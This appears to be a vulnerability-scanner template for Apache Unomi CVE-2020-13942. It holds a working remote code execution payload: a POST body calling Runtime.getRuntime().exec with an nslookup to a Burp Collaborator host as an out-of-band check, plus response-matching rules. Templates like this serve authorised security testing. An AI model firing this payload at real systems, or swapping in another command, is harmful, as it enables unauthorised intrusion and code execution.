id: cve-2020-13942
info:
  name: Apache Unomi CVE-2020-13942
  risk: Critical

params:
  - root: "{{.BaseURL}}"
  - cmd: 'nslookup 727t6j10fhhwzamv33ubhjw8mzsrgg.burpcollaborator.net'

requests:
  - method: POST
    redirect: false
    url: >-
     {{.root}}/context.json
    headers:
      - User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:55.0) Gecko/20100101 Firefox/55.0
      - Content-Type: application/json
    body: |
      {"filters":[{"id":"sam","filters":[{"condition":{"parameterValues":{"sam":"script::Runtime.getRuntime().exec('{{.cmd}}')"},"type":"profilePropertyCondition"}}]}],"sessionId":"sam"}
    detections:
      - >-
        StatusCode() == 200 && StringSearch('body', 'profileId') && StringSearch('resHeaders', 'application/json') && StringSearch('body', 'processedEvents')

reference:
  - link: https://securityboulevard.com/2020/11/apache-unomi-cve-2020-13942-rce-vulnerabilities-discovered/